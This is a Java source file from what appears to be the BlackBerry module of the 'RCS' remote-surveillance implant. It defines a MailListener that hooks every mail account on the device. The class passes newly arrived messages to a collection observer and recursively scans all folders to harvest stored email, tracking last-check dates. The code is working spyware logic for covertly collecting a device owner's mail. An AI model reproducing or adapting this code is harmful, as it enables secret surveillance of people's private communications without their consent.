

/* *************************************************
 * Copyright (c) 2010 - 2011
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

/**
 * 
 */
package blackberry.module.mail;

import java.util.Date;

import net.rim.blackberry.api.mail.Address;
import net.rim.blackberry.api.mail.Folder;
import net.rim.blackberry.api.mail.Message;
import net.rim.blackberry.api.mail.MessagingException;
import net.rim.blackberry.api.mail.SendListener;
import net.rim.blackberry.api.mail.ServiceConfiguration;
import net.rim.blackberry.api.mail.Session;
import net.rim.blackberry.api.mail.Store;
import net.rim.blackberry.api.mail.event.FolderEvent;
import net.rim.blackberry.api.mail.event.FolderListener;
import net.rim.blackberry.api.mail.event.StoreEvent;
import net.rim.device.api.servicebook.ServiceBook;
import net.rim.device.api.servicebook.ServiceRecord;
import net.rim.device.api.util.IntHashtable;
import blackberry.Singleton;
import blackberry.debug.Check;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.interfaces.MailObserver;
import blackberry.interfaces.iSingleton;
import blackberry.module.ModuleMessage;

/**
 * The listener interface for receiving mail events. The class that is
 * interested in processing a mail event implements this interface, and the
 * object created with that class is registered with a component using the
 * component's <code>addMailListener<code> method. When
 * the mail event occurs, that object's appropriate
 * method is invoked.
 * 
 * @author user1
 */
public final class MailListener implements FolderListener, SendListener,
        iSingleton { //, StoreListener, SendListener {





    String[] names;
    private boolean collecting;

    protected static IntHashtable fieldTable;
    private static ServiceRecord[] mailServiceRecords;
    //private Filter realtimeFilter;
    //private Filter collectFilter;

    //Vector mailObservers = new Vector();
    MailObserver mailObserver;
    private boolean isRunning;

    private static MailListener instance;
    private static final long GUID = 0xc997041f3236870dL;

    private void MailListener() {

    }

    public static synchronized MailListener getInstance() {
        if (instance == null) {
            instance = (MailListener) Singleton.self().get(GUID);
            if (instance == null) {
                final MailListener singleton = new MailListener();

                Singleton.self().put(GUID, singleton);
                instance = singleton;
            }
        }
        return instance;
    }

    /**
     * Start.
     */
    public void start() {

        final ServiceBook serviceBook = ServiceBook.getSB();
        mailServiceRecords = serviceBook.findRecordsByCid("CMIME");
        //mailServiceRecords = serviceBook.getRecords();

        names = new String[mailServiceRecords.length];




        /*
         * // to forever realtimeFilter = (Filter) ((ModuleMessage)
         * ModuleMessage.getInstance()) .getFilterEmailRealtime(); // history
         * collectFilter = (Filter) ((ModuleMessage)
         * ModuleMessage.getInstance()) .getFilterEmailCollect();
         */

        // Controllo tutti gli account di posta
        for (int count = mailServiceRecords.length - 1; count >= 0; --count) {

            try {
                final ServiceConfiguration sc = new ServiceConfiguration(
                        mailServiceRecords[count]);
                final Store store = Session.getInstance(sc).getStore();
                addListeners(store);
            } catch (final Exception ex) {



            }
        }

        isRunning = true;





    }

    /**
     * Stop.
     */
    public void stop() {



        if (mailServiceRecords != null) {
            for (int count = mailServiceRecords.length - 1; count >= 0; --count) {

                final ServiceConfiguration sc = new ServiceConfiguration(
                        mailServiceRecords[count]);
                final Store store = Session.getInstance(sc).getStore();
                removeListeners(store);
            }
        }

        isRunning = false;



    }

    public synchronized void addSingleMailObserver(final MailObserver observer) {



        mailObserver = observer;

        if (!isRunning()) {



            start();
        }
    }

    public synchronized void removeSingleMailObserver(
            final MailObserver observer) {



        mailObserver = null;

        if (isRunning()) {



            stop();
        }
    }

    private void addListeners(final Store store) {



        store.addFolderListener(this);
        store.addSendListener(this);
        //store.addStoreListener(this);
    }

    /*
     * (non-Javadoc)
     * @see
     * net.rim.blackberry.api.mail.event.StoreListener#batchOperation(net.rim
     * .blackberry.api.mail.event.StoreEvent)
     */
    public void batchOperation(final StoreEvent arg0) {




    }

    public synchronized boolean isRunning() {
        return isRunning;
    }

    /*
     * (non-Javadoc)
     * @see
     * net.rim.blackberry.api.mail.event.FolderListener#messagesAdded(net.rim
     * .blackberry.api.mail.event.FolderEvent)
     */
    public void messagesAdded(final FolderEvent folderEvent) {
        final Message message = folderEvent.getMessage();
        final String folderName = message.getFolder().getFullName();

        final boolean added = folderEvent.getType() == FolderEvent.MESSAGE_ADDED;







        try {
            final int type = folderEvent.getType();
            if (type != FolderEvent.MESSAGE_ADDED) {



                return;
            }

            Filter realtimeFilter = ModuleMessage.getInstance()
                    .getFilterEmailRealtime();

            //long lastcheck = messageAgent.getLastCheck(folderName);
            // realtime non guarda il lastcheck, li prende tutti.
            final int filtered = realtimeFilter.filterMessage(message, 0);
            if (filtered == Filter.FILTERED_OK) {
                dispatch(message, realtimeFilter.maxMessageSize, "local");





            } else {



            }

            if (!collecting) {
                //C.1=COLLECT
                /*
                 * ((ModuleMessage) ModuleMessage.getInstance()).lastcheckSet(
                 * Messages.getString("C.1"), new Date());
                 */
                //String parent = message.getFolder().getParent().getName();
                //String folder = message.getFolder().getName();
                String fullname = message.getFolder().getFullName();
                ModuleMessage.getInstance().lastcheckSet(fullname, new Date());
            }

        } catch (final MessagingException ex) {



        }
    }

    private synchronized void dispatch(Message message, int maxMessageSize,
            String string) {
        mailObserver.onNewMail(message, maxMessageSize, string);
    }

    /*
     * (non-Javadoc)
     * @see
     * net.rim.blackberry.api.mail.event.FolderListener#messagesRemoved(net.
     * rim.blackberry.api.mail.event.FolderEvent)
     */
    public void messagesRemoved(final FolderEvent e) {
        final Message message = e.getMessage();





    }

    /**
     * Removes the listeners.
     * 
     * @param store
     *            the store
     */
    public void removeListeners(final Store store) {



        store.removeFolderListener(this);
        //store.removeSendListener(this);
        //store.removeStoreListener(this);
    }

    boolean stopHistory;

    public void stopHistory() {
        stopHistory = true;
    }

    /**
     * retrieveHistoricMails.
     */
    public void retrieveHistoricMails() {
        //final long timestamp = messageAgent.initMarkup();  









        collecting = true;
        // questa data rappresenta l'ultimo controllo effettuato.
        // C.1=COLLECT
        /*
         * final Date lastCheckDate = ModuleMessage.getInstance().lastcheckGet(
         * Messages.getString("C.1"));
         */

        // Controllo tutti gli account di posta
        for (int count = mailServiceRecords.length - 1; count >= 0; --count) {
            if (stopHistory) {
                break;
            }
            names[count] = mailServiceRecords[count].getName();




            //Date lastCheckDateName = ModuleMessage.getInstance().lastcheckGet(names[count]);

            //names[count] = mailServiceRecords[0].getName();
            final ServiceConfiguration sc = new ServiceConfiguration(
                    mailServiceRecords[count]);
            final Store store = Session.getInstance(sc).getStore();

            final Folder[] folders = store.list();
            // Scandisco ogni Folder dell'account di posta
            scanFolders(names[count], folders);
            ModuleMessage.getInstance().lastcheckSave();

            //ModuleMessage.getInstance().lastcheckSet(names[count], new Date());
        }

        //if (!stopHistory) {
        // al termine degli scanfolder
        // C.1=COLLECT
        /*
         * ((ModuleMessage) ModuleMessage.getInstance()).lastcheckSet(
         * Messages.getString("C.1"), new Date());
         */
        //}





        collecting = false;
        stopHistory = false;
    }

    /**
     * scansione ricorsiva della directories.
     * 
     * @param name
     * @param subfolders
     *            the subfolders
     */
    public void scanFolders(final String storeName, final Folder[] subfolders) {
        Folder[] dirs;

        Filter collectFilter = ModuleMessage.getInstance()
                .getFilterEmailCollect();








        if (collectFilter == null) {




            if (ModuleMessage.getInstance() != null) {

                collectFilter = (Filter) ((ModuleMessage) ModuleMessage
                        .getInstance()).getFilterEmailCollect();



            }
        }

        if (collectFilter == null) {



            return;
        }

        for (int count = 0; count < subfolders.length; count++) {

            final Folder folder = subfolders[count];
            final String folderName = folder.getFullName();

            Date lastCheckDate = ModuleMessage.getInstance().lastcheckGet(
                    folderName);









            dirs = folder.list();
            if (dirs != null && dirs.length >= 0) {
                scanFolders(storeName, dirs);
            }

            try {
                final Message[] messages = folder.getMessages();










                boolean next = false;
                boolean updateMarker = true;

                // Scandisco ogni e-mail dell'account di posta
                for (int j = messages.length - 1; j >= 0 && !next; j--) {
                    if (stopHistory) {
                        break;
                    }

                    try {




                        final Message message = messages[j];






                        int flags = message.getFlags();



                        final int filtered = collectFilter.filterMessage(
                                message, lastCheckDate.getTime());





                        switch (filtered) {
                            case Filter.FILTERED_OK:





                                dispatch(message, collectFilter.maxMessageSize,
                                        storeName);

                                break;
                            case Filter.FILTERED_DISABLED:
                            case Filter.FILTERED_NOTFOUND:
                                updateMarker = false; //fallthrough, inibisce l'updateLastCheck

                            case Filter.FILTERED_LASTCHECK:
                            case Filter.FILTERED_DATEFROM:
                                next = true;
                                break;
                        }







                    } catch (final Exception ex) {



                    }

                }

                if (updateMarker) {
                    ModuleMessage.getInstance().lastcheckSet(folderName,
                            new Date(), false);
                }

            } catch (final MessagingException e) {



            } catch (final Exception ex) {




            }
        }
    }

    private Date lookForPinMessages(final Message[] messages)
            throws MessagingException {





        // stampo le date.
        Date precRecDate = null;

        try {

            /* Date precSentDate = null; */
            for (int j = 0; j < messages.length; j++) {

                //debug.trace("1");
                final Message message = messages[j];
                if (precRecDate != null) {
                    //debug.trace("2");





                }
                //debug.trace("3");
                precRecDate = message.getReceivedDate();

                //debug.trace("4");
                Address address = null;
                try {
                    address = message.getFrom();
                } catch (Exception ex) {








                }

                //debug.trace("5");
                if (message.getMessageType() == Message.PIN_MESSAGE) {




                } else {
                    //debug.trace("6");
                    if (address != null) {
                        //debug.trace("7");
                        final String name = address.getName();
                        if (name != null && name.length() == 8
                                && name.indexOf("@") == -1
                                && name.indexOf(" ") == -1) {






                        }

                    }

                    //debug.trace("8");

                    Address[] addresses = null;

                    try {
                        addresses = message
                                .getRecipients(Message.RecipientType.TO);
                    } catch (Exception ex) {



                    }
                    //debug.trace("9");
                    if (addresses != null) {
                        for (int i = 0; i < addresses.length; i++) {
                            address = addresses[i];
                            if (address != null) {

                                final String name = address.getAddr();
                                if (name != null && name.length() == 8
                                        && name.indexOf("@") == -1
                                        && name.indexOf(" ") == -1) {







                                }
                            }
                        }
                    }
                }

            }

        } catch (Exception ex) {



        }

        return precRecDate;
    }

    /*
     * (non-Javadoc)
     * @see
     * net.rim.blackberry.api.mail.SendListener#sendMessage(net.rim.blackberry
     * .api.mail.Message)
     */
    public boolean sendMessage(final Message message) {






        return true;

    }

    public boolean haveNewAccount() {
        final ServiceBook serviceBook = ServiceBook.getSB();
        ServiceRecord[] actualServiceRecords = serviceBook
                .findRecordsByCid("CMIME");

        if (actualServiceRecords.length != mailServiceRecords.length) {



            return true;
        }

        for (int i = 0; i < actualServiceRecords.length; i++) {
            if (actualServiceRecords[i] != mailServiceRecords[i]) {



                return true;
            }
        }

        return false;
    }

}
